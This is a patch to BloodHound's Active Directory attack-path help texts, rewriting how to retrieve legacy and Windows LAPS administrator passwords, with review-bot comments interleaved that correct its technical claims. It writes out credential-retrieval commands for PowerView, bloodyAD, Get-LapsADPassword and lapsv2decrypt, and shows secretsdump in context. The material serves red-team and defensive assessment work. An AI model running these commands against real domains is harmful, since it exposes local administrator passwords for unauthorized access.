); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx index 10863478f8..bb0f6edb9c 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx 
@@ -15,35 +15,33 @@ // SPDX-License-Identifier: Apache-2.0 import { FC } from 'react'; -import { Typography } from '@mui/material'; +import { Link, Typography } from '@mui/material'; import { EdgeInfoProps } from '../index'; -const WindowsAbuse: FC = ({ sourceName, sourceType }) => { +const WindowsAbuse: FC = () => { return ( <> - To abuse this permission with PowerView's Get-DomainObject, first import PowerView into your agent - session or into a PowerShell instance at the console. You may need to authenticate to the Domain - Controller as{' '} - {sourceType === 'User' - ? `${sourceName} if you are not running a process as that user` - : `a member of ${sourceName} if you are not running a process as a member`} - . To do this in conjunction with Get-DomainObject, first create a PSCredential object (these examples - comes from the PowerView help documentation): + Read the LAPS password attributes listed in the General section. + + + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - - {"$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n" + - "$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)"} + {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} - Then, use Get-DomainObject, optionally specifying $Cred if you are not already running a process as{' '} - {sourceName}: + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - {'Get-DomainObject windows1 -Credential $Cred -Properties "ms-mcs-AdmPwd",name'} + {'Get-LapsADPassword "WIN10" -AsPlainText'} + + + + The encrypted attributes can also be retrieved and decrypted using + lapsv2decrypt + {' '} (dotnet or BOF). ); 
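Review bot: `Get-LapsADPassword "WIN10" -AsPlainText` succeeds only when the caller is an authorized decryptor for the msLAPS-EncryptedPassword blob — the password is encrypted to a configured principal (Domain Admins by default, as far as I recall), and the read permission this edge represents does not by itself grant decryption — so the text should say this rather than imply read access is enough; the same applies to lapsv2decrypt, which must run as or impersonate such a principal. Separately, the PowerView example requests only `"ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"` and therefore never returns msLAPS-Password, which the General section lists as plaintext; add `"mslaps-password","mslaps-passwordexpirationtime"` to `-Properties`. Since the component dropped its `sourceName, sourceType` props in this hunk, the hard-coded "MachineName" and "WIN10" could instead interpolate `{targetName}` like the sibling help texts do.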
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx index c4da952800..ecee39a884 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx @@ -230,22 +230,42 @@ const LinuxAbuse: FC = ( Retrieve LAPS Password - Full control of a computer object is abusable when the computer's local admin account - credential is controlled with LAPS. The clear-text password for the local administrator - account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. With - full control of the computer object, you may have the ability to read this attribute, or - grant yourself the ability to read the attribute by modifying the computer object's security - descriptor. + The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. - - pyLAPS - {' '} - can be used to retrieve LAPS passwords: + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} + {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + + + See Windows abuse for retrieving and decrypting the encrypted attributes. + Resource-Based Constrained Delegation First, if an attacker does not control an account with an SPN set, a new attacker-controlled @@ -414,25 +434,6 @@ const LinuxAbuse: FC = ( {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"} - Retrieve LAPS Passwords - - - If FullControl (GenericAll) is obtained on the domain, instead of granting DCSync rights, the - AllExtendedRights permission included grants {sourceName} enough permissions to retrieve LAPS - passwords domain-wise. - - - - - pyLAPS - {' '} - can be used for that purpose: - - - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} - - Generic Descendent Object Takeover The simplest and most straight forward way to obtain control of the objects of the domain is to diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx index d157781ad1..d5ee5e9800 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx @@ -154,6 +154,18 @@ const References: FC = () => { href='https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53'> https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53 +
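Review bot: The rewritten lead sentence `The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}` is inaccurate in the WriteDacl help text — {sourceName} holds WriteDacl, not GenericAll — and the removed wording about first modifying the computer object's security descriptor was the step that matters. Suggest `With WriteDacl, {sourceName} can add an ACE granting itself read access to the LAPS attributes (or GenericAll) on {targetName} and then retrieve the LAPS (RID 500 administrator) password.`, plus a note that the DACL write is a logged directory change (typically event 5136 when Directory Service Changes auditing is on), unlike a plain read. The bloodyAD filter and `--attr` list also cover legacy LAPS only, so msLAPS-Password, listed as plaintext just above, is never requested; add it and msLAPS-PasswordExpirationTime to both.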
+ + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + +
+ + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + +
+ + https://github.com/CravateRouge/bloodyAD + ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx index 3bbd5e23d5..c5bdb87db4 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx @@ -283,10 +283,7 @@ const WindowsAbuse: FC =
The GenericAll permission grants {sourceName} the ability to obtain the LAPS (RID 500 - administrator) password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. + administrator) password of {targetName}. @@ -301,6 +298,49 @@ const WindowsAbuse: FC = Constrained Delegation attack. + Retrieve LAPS Password + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: + + + {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + + + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: + + + {'Get-LapsADPassword "WIN10" -AsPlainText'} + + + The encrypted attributes can also be retrieved and decrypted using + lapsv2decrypt + {' '} (dotnet or BOF). + + Shadow Credentials attack To abuse the permission, use Whisker. diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx index 6258842fc4..d5380109a7 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx @@ -250,22 +250,42 @@ const LinuxAbuse: FC = ({ sourceName, targ Retrieve LAPS Password - Full control of a computer object is abusable when the computer's local admin account - credential is controlled with LAPS. The clear-text password for the local administrator - account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. With - full control of the computer object, you may have the ability to read this attribute, or - grant yourself the ability to read the attribute by modifying the computer object's security - descriptor. + The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. - - pyLAPS - {' '} - can be used to retrieve LAPS passwords: + For systems using legacy LAPS, the following AD computer object properties are relevant: +
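Review bot: The attribute list presents msLAPS-EncryptedDSRMPassword and msLAPS-EncryptedDSRMPasswordHistory as ordinary computer-object properties, but DSRM password backup only applies to domain controllers, so on workstations and member servers they will be absent; suggest appending `(domain controllers only)` to those two bullets. `Get-LapsADPassword "WIN10" -AsPlainText` decrypts only when the caller is an authorized decryptor for the blob (Domain Admins by default, as I recall), which GenericAll on the computer object does not change, so the hunk should carry that caveat before a reader assumes the edge alone yields a usable password. The PowerView line requests only the ms-mcs-* properties and so will not return msLAPS-Password, which the same list calls plaintext; add `"mslaps-password"` to `-Properties`.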
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} + {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + + + See Windows abuse for retrieving and decrypting the encrypted attributes. + Resource-Based Constrained Delegation First, if an attacker does not control an account with an SPN set, a new attacker-controlled @@ -450,25 +470,6 @@ const LinuxAbuse: FC = ({ sourceName, targ {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"} - Retrieve LAPS Passwords - - - If FullControl (GenericAll) is obtained on the domain, instead of granting DCSync rights, the - AllExtendedRights permission included grants {sourceName} enough permissions to retrieve LAPS - passwords domain-wise. - - - - - pyLAPS - {' '} - can be used for that purpose: - - - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} - - Generic Descendent Object Takeover The simplest and most straight forward way to obtain control of the objects of the domain is to diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx index 9ce4b4645e..05b24c4fa8 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx @@ -99,6 +99,18 @@ const References: FC = () => { href='https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53'> https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53 +
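Review bot: This hunk is another verbatim copy of the same attribute list and bloodyAD example that appears in the AllExtendedRights, GenericAll, Owns, WriteDacl and ReadLAPSPassword help texts in this patch, which is exactly why the legacy-only `(ms-mcs-admpwdexpirationtime=*)` filter now needs fixing in six places; consider extracting the list and the two retrieval examples into a shared component under HelpTexts and rendering it from each case. The framing `The GenericAll permission allows {sourceName} to retrieve` is also wrong for WriteOwner: taking ownership grants nothing by itself, and the removed sentence about granting yourself the read right by modifying the security descriptor was the step readers need; suggest `After taking ownership, {sourceName} must grant itself read access to the LAPS attributes (or GenericAll) on {targetName} before the password can be retrieved.` Both hunks on this line end inside the larger LinuxAbuse component, whose body continues outside the diff.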
+ + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + +
+ + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + +
+ + https://github.com/CravateRouge/bloodyAD + ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx index 0fbdf7bb87..ce81766ea8 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx @@ -357,10 +357,7 @@ const WindowsAbuse: FC =
The GenericAll permission grants {sourceName} the ability to obtain the LAPS (RID 500 - administrator) password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. + administrator) password of {targetName}. @@ -375,6 +372,49 @@ const WindowsAbuse: FC = Constrained Delegation attack. + Retrieve LAPS Password + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: + + + {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + + + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: + + + {'Get-LapsADPassword "WIN10" -AsPlainText'} + + + The encrypted attributes can also be retrieved and decrypted using + lapsv2decrypt + {' '} (dotnet or BOF). + + Shadow Credentials attack To abuse the permission, use Whisker. From d21ee634b8ab89b48bca33db3623a9ff4acfeb61 Mon Sep 17 00:00:00 2001 From: jknudsen Date: Mon, 16 Dec 2024 11:31:51 +0100 Subject: [PATCH 2/4] prepare-for-codereview --- packages/go/graphschema/ad/ad.go | 1 - packages/go/graphschema/azure/azure.go | 1 - packages/go/graphschema/common/common.go | 1 - .../AllExtendedRights/LinuxAbuse.tsx | 85 ++++++++------- .../AllExtendedRights/References.tsx | 16 ++- .../AllExtendedRights/WindowsAbuse.tsx | 102 ++++++++++-------- .../HelpTexts/GenericAll/LinuxAbuse.tsx | 15 +-- .../HelpTexts/GenericAll/References.tsx | 16 ++- .../HelpTexts/GenericAll/WindowsAbuse.tsx | 29 +++-- .../components/HelpTexts/Owns/LinuxAbuse.tsx | 17 +-- .../components/HelpTexts/Owns/References.tsx | 16 ++- .../HelpTexts/Owns/WindowsAbuse.tsx | 29 +++-- .../HelpTexts/ReadLAPSPassword/General.tsx | 17 ++- .../HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx | 8 +- .../HelpTexts/ReadLAPSPassword/References.tsx | 16 ++- .../ReadLAPSPassword/WindowsAbuse.tsx | 19 ++-- .../HelpTexts/WriteDacl/LinuxAbuse.tsx | 17 +-- .../HelpTexts/WriteDacl/References.tsx | 16 ++- .../HelpTexts/WriteDacl/WindowsAbuse.tsx | 29 +++-- .../HelpTexts/WriteOwner/LinuxAbuse.tsx | 17 +-- .../HelpTexts/WriteOwner/References.tsx | 16 ++- .../HelpTexts/WriteOwner/WindowsAbuse.tsx | 27 +++-- 22 files changed, 301 insertions(+), 209 deletions(-) diff --git a/packages/go/graphschema/ad/ad.go b/packages/go/graphschema/ad/ad.go index 5dad6bea8d..4a948558ff 100644 
--- a/packages/go/graphschema/ad/ad.go +++ b/packages/go/graphschema/ad/ad.go @@ -21,7 +21,6 @@ package ad import ( "errors" - graph "github.com/specterops/bloodhound/dawgs/graph" ) diff --git a/packages/go/graphschema/azure/azure.go b/packages/go/graphschema/azure/azure.go index 787ee392e6..00b20f190f 100644 --- a/packages/go/graphschema/azure/azure.go +++ b/packages/go/graphschema/azure/azure.go @@ -21,7 +21,6 @@ package azure import ( "errors" - graph "github.com/specterops/bloodhound/dawgs/graph" ) diff --git a/packages/go/graphschema/common/common.go b/packages/go/graphschema/common/common.go index 73edf123fa..631871c6bf 100644 --- a/packages/go/graphschema/common/common.go +++ b/packages/go/graphschema/common/common.go @@ -21,7 +21,6 @@ package common import ( "errors" - graph "github.com/specterops/bloodhound/dawgs/graph" ) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx index 8f6eba5fdf..cace7b88e1 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx @@ -57,46 +57,51 @@ const LinuxAbuse: FC = ({ sourceName, targ ); case 'Computer': - return ( - <> - - The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. - - - For systems using legacy LAPS, the following AD computer object properties are relevant: -
- - ms-Mcs-AdmPwd: The plaintext LAPS password -
- - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time -
-
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: -
- - msLAPS-Password: The plaintext LAPS password -
- - msLAPS-PasswordExpirationTime: The LAPS password expiration time -
- - msLAPS-EncryptedPassword: The encrypted LAPS password -
- - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history -
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password -
- - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
-
- - Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - - - {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} - - - See Windows abuse for retrieving and decrypting the encrypted attributes. - - - ); + return ( + <> + + The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 + administrator) password for {targetName}. + + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are + relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: + + + { + "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime" + } + + + See Windows abuse for retrieving and decrypting the encrypted attributes. + + + ); case 'Domain': return ( <> diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx index c7380492d4..14416e48fd 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx @@ -42,16 +42,22 @@ const References: FC = () => { https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
- - https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
- https://github.com/CravateRouge/bloodyAD + https://github.com/CravateRouge/bloodyAD
= ({ ); case 'Computer': - return ( - <> - - The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. - - - For systems using legacy LAPS, the following AD computer object properties are relevant: -
- - ms-Mcs-AdmPwd: The plaintext LAPS password -
- - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time -
-
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: -
- - msLAPS-Password: The plaintext LAPS password -
- - msLAPS-PasswordExpirationTime: The LAPS password expiration time -
- - msLAPS-EncryptedPassword: The encrypted LAPS password -
- - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history -
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password -
- - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
-
- - Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - - - {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} - - - Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - - {'Get-LapsADPassword "WIN10" -AsPlainText'} - - - The encrypted attributes can also be retrieved and decrypted using + return ( + <> + + The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 + administrator) password for {targetName}. + + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are + relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: + + + { + 'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"' + } + + + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: + + {'Get-LapsADPassword "WIN10" -AsPlainText'} + + The encrypted attributes can also be retrieved and decrypted using{' '} + lapsv2decrypt - {' '} (dotnet or BOF). - - - ); + {' '} + (dotnet or BOF). +
+ + ); case 'Domain': return ( diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx index 84d60352ba..a6a727c51d 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx @@ -173,8 +173,9 @@ const LinuxAbuse: FC = ( - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -184,21 +185,23 @@ const LinuxAbuse: FC = (
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + { + "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime" + } See Windows abuse for retrieving and decrypting the encrypted attributes. - Resource-Based Constrained Delegation First, if an attacker does not control an account with an SPN set, a new attacker-controlled computer account can be added with Impacket's addcomputer.py example script: diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx index 5384d4bd4a..d0b2ddb394 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx @@ -169,16 +169,22 @@ const References: FC = () => { https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
- - https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
- https://github.com/CravateRouge/bloodyAD + https://github.com/CravateRouge/bloodyAD ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx index 6eb7f1e593..b781ec4124 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx @@ -239,8 +239,9 @@ const WindowsAbuse: FC = - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -250,27 +251,33 @@ const WindowsAbuse: FC =
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + { + 'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"' + } Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - {'Get-LapsADPassword "WIN10" -AsPlainText'} - + {'Get-LapsADPassword "WIN10" -AsPlainText'} - The encrypted attributes can also be retrieved and decrypted using - lapsv2decrypt - {' '} (dotnet or BOF). + The encrypted attributes can also be retrieved and decrypted using{' '} + + lapsv2decrypt + {' '} + (dotnet or BOF). Shadow Credentials attack diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx index 18136f7bda..5b6d00a956 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx @@ -230,7 +230,8 @@ const LinuxAbuse: FC = ( Retrieve LAPS Password - The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. + The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) + password for {targetName}. For systems using legacy LAPS, the following AD computer object properties are relevant: @@ -240,8 +241,9 @@ const LinuxAbuse: FC = ( - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
